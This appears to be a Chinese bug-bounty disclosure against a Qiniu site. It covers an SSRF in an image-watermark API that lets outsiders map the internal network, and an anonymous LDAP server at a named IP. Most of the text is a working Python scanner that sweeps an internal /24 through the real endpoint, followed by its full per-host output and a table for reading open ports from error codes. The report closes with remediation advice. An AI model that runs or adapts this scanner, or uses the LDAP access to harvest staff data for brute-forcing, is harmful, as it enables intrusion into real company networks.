七牛某站SSRF可探测内网

一、SSRF漏洞
有漏洞的貌似是一个测试站。存在SSRF漏洞接口的作用是先获取远程的图片,然后把图片制作成水印覆盖在当前图片上,用百度的logo做演示,http://demos.qiniu.com/demo/qimage/index.html

效果如下:

http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cHM6Ly93d3cuYmFpZHUuY29tL2ltZy9iZF9sb2dvMS5wbmc=/dissolve/100/gravity/SouthEast

image后边的那串base64编码是你要探测的IP和端口,如何知道内网的IP呢。这里探测到七牛的一个IP存在elasticsearch未授权访问。

可知内网中至少存在这样一个网段:

code 区域
<code>172.30.251.168:9200</code>

将http://172.30.251.168:9200编码为base64放在image后。

<code>http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cDovLzE3Mi4zMC4yNTEuMTY4OjkyMDA=/dissolve/100/gravity/SouthEast</code>

如果当前IP存活且端口开放的话,会返回501错误。如探测 http://172.30.251.168:9200

如果当前IP不存活或者端口不开放的话,会返回502错误。如探测 http://172.30.251.168:1356

经过测试总结出以下规律。

code 区域
<code>返回403——IP存活且端口开放,但是该目录禁止访问

返回404——IP存活且端口开放,但是不存在该图片

返回501——IP存活且端口开放

返回502——IP不存活或者端口不开放</code>

这里为了方便测试,写了一个探测172.30.251网段80端口是否开放的脚本,返回501错误的就是IP存活且端口开放。当然如果再深入些,可以通过探测程序的默认logo或者favicon.ico来判断目标是什么应用。

code 区域
<code>#coding=utf-8

'''

poc: qiniu_ssrf

url: http://demos.qiniu.com/demo/qimage/index.html

'''

import requests

import base64

from IPy import IP



mask = IP('172.30.251.0/24')

for ip in mask:

    print ip

    b64Domain = base64.b64encode('http://' + str(ip))

    #print b64Domain

    req = requests.get("http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/%s/dissolve/100/gravity/SouthEast" % b64Domain)

    print req.text + "\n"

    qnfile = file('/tmp/qnscan.txt', 'a')

    qnfile.write(str(ip) + '\n' + str(req.text) + '\n\n')

    qnfile.close()</code>

这是返回的结果

code 区域
<code>172.30.251.0

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.1

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.2

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.3

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.4

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.5

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.6

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.7

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.8

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.9

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.10

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.11

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.12

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.13

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.14

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.15

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.16

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.17

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.18

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.19

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.20

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.21

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.22

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.23

{"error":"fetch image url failed and statusCode: 403"}



172.30.251.24

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.25

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.26

{"error":"fetch image url failed and statusCode: 403"}



172.30.251.27

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.28

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.29

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.30

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.31

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.32

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.33

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.34

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.35

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.36

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.37

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.38

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.39

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.40

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.41

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.42

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.43

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.44

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.45

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.46

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.47

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.48

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.49

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.50

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.51

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.52

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.53

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.54

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.55

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.56

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.57

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.58

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.59

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.60

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.61

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.62

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.63

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.64

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.65

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.66

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.67

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.68

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.69

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.70

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.71

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.72

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.73

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.74

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.75

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.76

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.77

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.78

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.79

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.80

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.81

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.82

{"error":"fetch image url failed and statusCode: 503"}



172.30.251.83

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.84

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.85

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.86

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.87

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.88

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.89

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.90

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.91

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.92

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.93

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.94

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.95

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.96

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.97

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.98

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.99

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.100

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.101

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.102

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.103

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.104

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.105

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.106

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.107

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.108

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.109

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.110

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.111

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.112

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.113

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.114

{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-23441q7XWC6pITgES': No such file or directory @ error/constitute.c/ReadImage/540"}



172.30.251.115

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.116

{"error":"fetch image url failed and statusCode: 404"}



172.30.251.117

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.118

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.119

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.120

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.121

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.122

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.123

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.124

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.125

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.126

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.127

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.128

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.129

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.130

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.131

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.132

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.133

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.134

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.135

{"error":"fetch image url failed and statusCode: 404"}



172.30.251.136

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.137

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.138

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.139

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.140

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.141

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.142

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.143

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.144

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.145

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.146

{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-5107kShQhExKivuz': No such file or directory @ error/constitute.c/ReadImage/540"}



172.30.251.147

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.148

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.149

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.150

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.151

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.152

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.153

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.154

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.155

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.156

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.157

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.158

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.159

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.160

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.161

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.162

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.163

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.164

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.165

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.166

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.167

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.168

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.169

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.170

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.171

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.172

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.173

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.174

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.175

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.176

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.177

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.178

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.179

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.180

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.181

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.182

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.183

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.184

{"error":"unsupported format:unsupported format:ERROR_CODER: Entity 'nbsp' not defined\n `No such file or directory` @ error/svg.c/SVGError/2639"}



172.30.251.185

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.186

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.187

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.188

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.189

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.190

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.191

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.192

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.193

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.194

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.195

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.196

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.197

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.198

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.199

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.200

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.201

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.202

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.203

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.204

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.205

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.206

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.207

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.208

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.209

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.210

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.211

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.212

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.213

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.214

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.215

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.216

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.217

{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-24069p9eQJObZhm7U': No such file or directory @ error/constitute.c/ReadImage/540"}



172.30.251.218

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.219

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.220

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.221

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.222

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.223

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.224

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.225

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.226

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.227

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.228

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.229

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.230

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.231

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.232

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.233

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.234

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.235

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.236

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.237

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.238

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.239

{"error":"fetch image url failed and statusCode: 404"}



172.30.251.240

{"error":"fetch image url failed and statusCode: 403"}



172.30.251.241

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.242

{"error":"fetch image url failed and statusCode: 403"}



172.30.251.243

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.244

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.245

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.246

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.247

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.248

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.249

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.250

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.251

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.252

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.253

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.254

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.255

{"error":"fetch image url failed and statusCode: 502"}</code>

二、LDAP匿名访问

code 区域
<code>IP:115.231.182.75

端口:389</code>

可获取企业的所有人员信息,利用这些信息可以用来爆破邮箱或者使用ldap登录的应用。

在测试时,你们搭的一个洋葱的应用(115.231.182.75:8090)因为有漏洞,不小心测挂掉了,实在是抱歉。

漏洞证明:

见详细说明

修复方案:

1. SSRF漏洞,可以统一下返回错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态,且限制服务器访问的IP不能是内网IP。

2. Ldap漏洞,建议关掉Ldap的匿名访问功能。